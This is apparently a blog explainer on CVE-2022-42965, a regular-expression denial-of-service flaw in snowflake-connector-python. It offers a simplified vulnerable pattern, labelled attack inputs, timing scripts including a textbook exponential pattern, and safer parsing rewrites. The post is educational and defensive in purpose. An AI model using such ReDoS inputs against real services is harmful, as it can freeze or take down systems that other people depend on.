CVE-2022-42965 - How a Simple Regex Bug in snowflake-connector-python Leads to Exponential ReDoS

If you use the Snowflake database with Python, you probably rely on the snowflake-connector-python package, one of the most popular libraries for database interaction on PyPI. But what happens if a tiny bug inside it can take your server down? That’s exactly what CVE-2022-42965 is about: an exponential Regular Expression Denial of Service (ReDoS) vulnerability.

In this post, I’ll break down what went wrong, how the exploit works, and how you can protect yourself—using plain, non-technical English and easy-to-follow code snippets.

What is ReDoS, and Why Does It Matter?

ReDoS stands for Regular Expression Denial of Service. It happens when a program uses a vulnerable regex (regular expression) and a user can supply specially crafted input that makes the regex run *very* slowly, sometimes taking seconds or even minutes for a single string! This can freeze your app, wreck performance, or let attackers take your service down entirely.

About the Vulnerable Method: get_file_transfer_type

In the snowflake-connector-python package, there's an _undocumented_ function called get_file_transfer_type(). While it wasn't meant for general use, if you could supply untrusted input to it (maybe by accident, or through a slip in your code), an attacker could easily cause a slowdown.

Inside this function is a problematic regular expression pattern—one that accidentally allows exponential backtracking.

The Vulnerable Code

Here’s a simplified illustration of the kind of code involved. It is not the exact pattern from the snowflake-connector-python library:

import re

def get_file_transfer_type(name):
    # Vulnerable pattern - look at those (.*)
    # (simplified for illustration)
    pattern = r"^((.*)://)?(.*)$"
    match = re.match(pattern, name)
    if match:
        # Some logic using match.groups()
        return "parsed"
    return "unknown"

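In this simplified illustration, the function parses URI-like strings (such as s3://bucket/file.csv), and the pattern is very permissive: both (.*) groups can match anything. Note that the simplified pattern has no alternation and no nested repetition, so on its own it backtracks only linearly. Catastrophic (exponential) backtracking needs a repeated group whose contents can match the same text in many different ways, typically a quantifier inside another quantifier. That kind of construct is what makes a ReDoS exponential, which is how the CVE describes this bug.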

Suppose an attacker manages to pass carefully crafted input like this:

evil = "a" * 20 + "!" * 20 + "b"
get_file_transfer_type(evil)

But, to really cause trouble, the attacker provides input that causes the regex engine to try lots of possible matches—like:

# Example ReDoS payload
payload = '!' * 30 + '!' * 30 + '!'
get_file_transfer_type(payload)

Against a pattern with nested, ambiguous repetition, each extra character roughly doubles the number of paths the regex engine must try before it can give up. Even if the input is short, the matching can take a *ferociously long* time.
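To make the "exponential" part concrete, here is a minimal sketch that counts how many ways a run of n identical characters can be cut into consecutive non-empty chunks. That is roughly the search space a backtracking engine faces with a textbook nested pattern such as (a+)+ when the overall match is doomed to fail. The helper name count_splits is hypothetical, and the counting is a model of the problem, not a trace of the real regex engine.

```python
from functools import lru_cache


@lru_cache(maxsize=None)
def count_splits(n):
    """Count the ways to cut a run of n characters into consecutive non-empty chunks."""
    if n == 0:
        return 1  # exactly one way to split nothing: use no chunks
    # Pick the length of the first chunk, then split whatever remains.
    return sum(count_splits(n - first) for first in range(1, n + 1))


for n in (5, 10, 20, 30):
    # The count doubles with every extra character: 2 ** (n - 1).
    print(n, count_splits(n))
```

Thirty characters already give more than half a billion candidate splits, which is why a short payload is enough.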

Real Exploit Example

Let’s see this in action. Try the code below—just don’t do this on production!

import re
import time

def slow_regex(name):
    pattern = r"^((.*)://)?(.*)$"
    # perf_counter() is a monotonic, high-resolution clock suited to timing
    start = time.perf_counter()
    # This is the line under test
    re.match(pattern, name)
    took = time.perf_counter() - start
    print(f"Regex took {took:.2f} seconds for input of length {len(name)}")

# Small input, instant
slow_regex("https://snowflake.com")
# Malicious input, BAD
evil_input = "!" * 30 + "!" * 30 + "!"
slow_regex(evil_input)

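Against a pattern that really does backtrack exponentially, the second call takes far longer than the first. The simplified pattern used here contains no nested repetition, so in CPython both calls return almost instantly; treat this snippet as a timing harness rather than a working exploit.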
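To watch genuine exponential growth, the sketch below times the textbook pattern ^(a+)+$ on inputs of increasing length. This pattern is an assumption chosen for illustration; it is not the regex from snowflake-connector-python. The helper name time_match is hypothetical too. The sizes are kept small on purpose so the script finishes quickly.

```python
import re
import time

# Textbook exponential pattern: a repeated group that itself contains a
# repetition. NOT the pattern from snowflake-connector-python.
TEXTBOOK_PATTERN = re.compile(r"^(a+)+$")


def time_match(text):
    """Return (matched, seconds) for a single match attempt."""
    start = time.perf_counter()
    matched = TEXTBOOK_PATTERN.match(text) is not None
    return matched, time.perf_counter() - start


for n in (12, 16, 20):
    # The trailing "!" guarantees failure, so the engine has to exhaust
    # every way of dividing the run of "a" characters before giving up.
    matched, seconds = time_match("a" * n + "!")
    print(f"n={n:2d} matched={matched} took {seconds:.4f}s")
```

Each step of four extra characters should cost very roughly sixteen times as long, though exact timings depend on your machine and Python version. Don't push n much past the mid-20s unless you are prepared to wait.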

Why is This Dangerous?

- Remote attackers could trigger this by sending malicious data to any API or service that passes user input to get_file_transfer_type.
- Any code that ends up calling this method with untrusted input (directly or indirectly) is at risk.

Remember, the function is *undocumented*, but sometimes legacy apps or complex codebases accidentally expose such functions!

Here’s a safer rewrite:

import urllib.parse

def get_file_transfer_type(name):
    parsed = urllib.parse.urlparse(name)
    # Now, no catastrophic backtracking!
    if parsed.scheme:
        return parsed.scheme
    return "unknown"


Let the urllib.parse module do the heavy lifting.
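For the simplified scheme://rest shape used in this post, plain string methods are another regex-free option. The sketch below uses str.partition, which scans the input once and cannot backtrack. The helper name split_scheme is hypothetical and is not part of snowflake-connector-python.

```python
def split_scheme(name):
    """Split 'scheme://rest' into (scheme, rest); scheme is None if absent."""
    # partition() returns (before, separator, after); the separator is an
    # empty string when "://" does not occur in the input.
    scheme, separator, rest = name.partition("://")
    if not separator:
        return None, name
    return scheme, rest


print(split_scheme("s3://bucket/file.csv"))
print(split_scheme("file.csv"))
```

One design note: partition splits at the first "://", whereas the greedy (.*) in the simplified regex would split at the last one. Use rpartition if you need that behavior.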

The Takeaway

A tiny regex in a hidden method almost no one knows about can still bring your system to a crawl. That’s the risk of ReDoS, and why keeping packages up-to-date and using safe parsing methods _matters_. Check your code, update your dependencies, and stay safe out there!

Timeline

Published on: 11/09/2022 20:15:00 UTC
Last modified on: 12/02/2022 22:46:00 UTC